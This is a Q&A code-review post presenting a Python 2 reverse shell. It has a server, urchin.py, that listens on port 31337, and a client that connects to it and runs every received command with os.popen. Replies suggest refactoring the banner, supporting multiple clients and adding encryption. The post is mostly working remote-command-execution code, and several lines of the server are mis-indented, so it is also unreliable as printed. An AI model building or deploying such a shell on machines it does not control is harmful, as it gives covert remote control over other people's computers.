# Reverse shell allows connection between computers

Tags: python, python-2.x, security, shell

I've recently made a reverse-shell which allows you remote shell access to other computers.

It's written in Python 2 and it is cross-platform. Basically, it get's user input for a command and sends it to the client with `socket`s. The client then runs it with `os.system`.

Here's the code for the server (`urchin.py`):

```
#!/usr/bin/python
import socket, os, sys, platform

if 'Windows' in platform.system():
    os.system('cls')
    print "  |     |  | ,--` ,--` |  | --- ,--`"
    print "\ * /   |  | |  | |    |  |  |  |  |"
    print "-*+*-   |  | |--, |    |--|  |  |  |"
    print "/ * \   |  | | \  |    |  |  |  |  |"
    print "  |     `__, |  \ `__, |  | --- |  |"
    print ""
    print "Developer : Keegan Kuhn (keeganjk)"
    print "Version   : v1.1.1 (Pluteus)"
else:
    os.system("clear")  
    print "  |     |  | ,--` ,--` |  | --- ,--`"
    print "\ * /   |  | |  | |    |  |  |  |  |"
    print "-*+*-   |  | |--, |    |--|  |  |  |"
    print "/ * \   |  | | \  |    |  |  |  |  |"
    print "  |     `__, |  \ `__, |  | --- |  |"
    print ""
    print "Developer : Keegan Kuhn (\033[1;31mkeeganjk\033[0;0m)"
    print "Version   : v1.1.1 (\033[0;32mPluteus\033[0;0m)"

port = 31337
s = socket.socket()
s.bind(('', port))
print ""
print "[*] Waiting for connection ..."
s.listen(1)
while True:
    c, addr = s.accept()
    print "[+] Accepted connection from", addr, "!"
        print ""
    while True:
        cmd = raw_input("$ ")
        if cmd == "python":
            while cmd != "exit()":
                cmd = raw_input(">>> ")
                if cmd == "exit":
                    print "Use exit() to exit"
                cmd = "python -c '" + cmd + "'"
                c.send(cmd)
                print c.recv(1024)

        elif cmd == "bash":
            while True:
                cmd = raw_input("bash$ ")
                cmd = "bash -c '" + cmd + "'"
                c.send(cmd)
                print c.recv(1024)

        elif cmd == "quit" or cmd == "exit":
            c.send('quit')
            s.close()
                sys.exit(1)
        else:
                c.send(cmd)
            print c.recv(1024)
```

And here's the code for `client.py`:

```
#!/usr/bin/python
import socket, os, sys
s = socket.socket()
host = '127.0.0.1'
port = 31337
s.connect((host, port))
while True:
    cmd = s.recv(1024)
    if cmd[:2] == "cd":
        os.chdir(str(cmd[3:]))
        o = " "
        s.send(o)
    elif cmd == "quit":
        s.close()
        sys.exit(1)
    else:
        o = os.popen(cmd).read()
        s.send(o)
```

Any suggestions? How can I make this work better?

Comment: You could remove the banner, it would save 25 lines of code.

Comment: This code is blocking, multiple clients will not be able to access the same server at the same time.

Answer (score 1):

> > Any suggestions?

The block of *flavor text* within that `if`/`else`...

```py
    print "  |     |  | ,--` ,--` |  | --- ,--`"
    print "\ * /   |  | |  | |    |  |  |  |  |"
    print "-*+*-   |  | |--, |    |--|  |  |  |"
    print "/ * \   |  | | \  |    |  |  |  |  |"
    print "  |     `__, |  \ `__, |  | --- |  |"
    print ""
    print "Developer : Keegan Kuhn (keeganjk)"
    print "Version   : v1.1.1 (Pluteus)"
```

... might be easier to extend upon via Python `format`ing...

```py
__about__ = """
  |     |  | ,--` ,--` |  | --- ,--`
\ * /   |  | |  | |    |  |  |  |  |
-*+*-   |  | |--, |    |--|  |  |  |
/ * \   |  | | \  |    |  |  |  |  |
  |     `__, |  \ `__, |  | --- |  |

Developer: {author_name} ({author_nic})
Version:   v{version_num} ({version_nic})
"""

# ... other setup stuff maybe

if 'Windows' in platform.system():
    os.system('cls')
    print(__about__.format(author_name = 'Keegan Kuhn',
                           author_nic = 'keeganjk',
                           version_num = '1.1.1',
                           version_nic = 'Plauteus'))
else:
    os.system("clear")
    print(__about__.format(
        author_name = 'Keegan Kuhn',
        author_nic = '\033[1;31mkeeganjk\033[0;0m',
        version_num = '1.1.1',
        version_nic = '\033[0;32mPlauteus\033[0;0m'))
```

> > How can I make this work better?

[@Joshua Klein](https://codereview.stackexchange.com/questions/169713/reverse-shell-allows-connection-between-computers#) already pointed out that the code be blocking ya from the *joys* of multi-client access. Though I'd suggest considering some form of encryption and authentication of each connection and their messages first.

If you're really going after multi-OS support I'd advise having a handy way of spawning shells on each, Windows (last I checked) does **not** have Bash pre-installed.

After that it might be *fancy* to add `argpars` to the client and server scripts as well as some form of configuration file parsing.

---

Looking closer, one wonders what happens when you assign a variable and later try to access it?